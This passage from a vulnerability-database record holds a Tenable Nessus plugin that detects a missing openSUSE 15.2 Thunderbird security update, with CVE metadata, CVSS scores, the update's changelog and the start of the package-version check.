over it with the mouse when using Windows 7 Classic theme (bmo#1675970)\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2020-11-30T00:00:00", "type": "nessus", "title": "openSUSE Security Update : MozillaThunderbird (openSUSE-2020-2096)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-15999", "CVE-2020-16012", "CVE-2020-26951", "CVE-2020-26953", "CVE-2020-26956", "CVE-2020-26958", "CVE-2020-26959", "CVE-2020-26960", "CVE-2020-26961", "CVE-2020-26965", "CVE-2020-26966", "CVE-2020-26968"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:MozillaThunderbird", "p-cpe:/a:novell:opensuse:MozillaThunderbird-debuginfo", "p-cpe:/a:novell:opensuse:MozillaThunderbird-debugsource", "p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-common", "p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-other", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2020-2096.NASL", "href": "https://www.tenable.com/plugins/nessus/143357", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-2096.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(143357);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2020-15999\",\n \"CVE-2020-16012\",\n \"CVE-2020-26951\",\n \"CVE-2020-26953\",\n \"CVE-2020-26956\",\n \"CVE-2020-26958\",\n \"CVE-2020-26959\",\n \"CVE-2020-26960\",\n \"CVE-2020-26961\",\n \"CVE-2020-26965\",\n \"CVE-2020-26966\",\n \"CVE-2020-26968\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0124\");\n\n script_name(english:\"openSUSE Security Update : MozillaThunderbird (openSUSE-2020-2096)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for MozillaThunderbird fixes the following issues :\n\nTODO\n\n - Mozilla Thunderbird 78.5.0\n\n - new: OpenPGP: Added option to disable attaching the\n public key to a signed message (bmo#1654950)\n\n - new: MailExtensions: 'compose_attachments' context added\n to Menus API (bmo#1670822)\n\n - new: MailExtensions: Menus API now available on\n displayed messages (bmo#1670825)\n\n - changed: MailExtensions: browser.tabs.create will now\n wait for 'mail-delayed-startup-finished' event\n (bmo#1674407)\n\n - fixed: OpenPGP: Support for inline PGP messages improved\n (bmo#1672851)\n\n - fixed: OpenPGP: Message security dialog showed\n unverified keys as unavailable (bmo#1675285)\n\n - fixed: Chat: New chat contact menu item did not function\n (bmo#1663321)\n\n - fixed: Various theme and usability improvements\n (bmo#1673861)\n\n - fixed: Various security fixes MFSA 2020-52 (bsc#1178894)\n\n - CVE-2020-26951 (bmo#1667113) Parsing mismatches could\n confuse and bypass security sanitizer for chrome\n privileged code\n\n - CVE-2020-16012 (bmo#1642028) Variable time processing of\n cross-origin images during drawImage calls\n\n - CVE-2020-26953 (bmo#1656741) Fullscreen could be enabled\n without displaying the security UI\n\n - CVE-2020-26956 (bmo#1666300) XSS through paste (manual\n and clipboard API)\n\n - CVE-2020-26958 (bmo#1669355) Requests intercepted\n through ServiceWorkers lacked MIME type restrictions\n\n - CVE-2020-26959 (bmo#1669466) Use-after-free in\n WebRequestService\n\n - CVE-2020-26960 (bmo#1670358) Potential use-after-free in\n uses of nsTArray\n\n - CVE-2020-15999 (bmo#1672223) Heap buffer overflow in\n freetype\n\n - CVE-2020-26961 (bmo#1672528) DoH did not filter IPv4\n mapped IP Addresses\n\n - CVE-2020-26965 (bmo#1661617) Software keyboards may have\n remembered typed passwords\n\n - CVE-2020-26966 (bmo#1663571) Single-word search queries\n were also broadcast to local network\n\n - CVE-2020-26968 (bmo#1551615, bmo#1607762, bmo#1656697,\n bmo#1657739, bmo#1660236, bmo#1667912, bmo#1671479,\n bmo#1671923) Memory safety bugs fixed in Thunderbird\n 78.5\n\n - Mozilla Thunderbird 78.4.3 \n\n - fixed: User interface was inconsistent when switching\n from the default theme to the dark theme and back to the\n default theme (bmo#1659282)\n\n - fixed: Email subject would disappear when hovering over\n it with the mouse when using Windows 7 Classic theme\n (bmo#1675970)\n\nThis update was imported from the SUSE:SLE-15:Update update project.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1178894\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected MozillaThunderbird packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-26968\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/11/03\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/11/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/11/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:MozillaThunderbird-translations-other\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$